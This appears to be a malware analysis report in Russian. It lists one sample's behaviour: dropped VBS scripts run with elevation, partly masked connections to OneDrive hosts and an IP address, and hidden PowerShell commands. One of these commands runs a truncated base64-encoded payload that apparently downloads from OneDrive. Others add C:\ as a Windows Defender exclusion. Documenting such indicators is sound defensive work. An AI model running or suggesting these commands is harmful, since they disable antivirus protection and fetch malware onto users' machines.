Техническая информация
- Средство контроля пользовательских учетных записей (UAC)
- $asxzdbjdfdfdf.replace(}}}} as /
- %LOCALAPPDATA%\tempravendefender.vbs
- %LOCALAPPDATA%\tempdisable.vbs
- '10#.#12.180.189':5556
- 'on####ve.live.com':443
- 'ze####.#m.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK ze####.#m.files.1drv.com
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\TempRavendefender.vbs"
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\TempDisable.vbs"
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\TempRavendefender.vbs" /elevate
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -enc JABBAFMAWABaAGQAYgBqAGQAZgBkAGYAZABmACAAPQAgAEAAJwANAAoAaAB0AHQAcABzADoALwAvAG8AbgBlAGQAcgBpAHYAZQAuAGwAaQB2AGUALgBjAG8AbQAvAEQAbwB3AG4AbABvAGEAZAA/AGMAaQBkAD0AMwAyADQAQQAzADQANQBF...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit Add-MpPreference -ExclusionPath C:\' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit Add-MpPreference -ExclusionPath C:\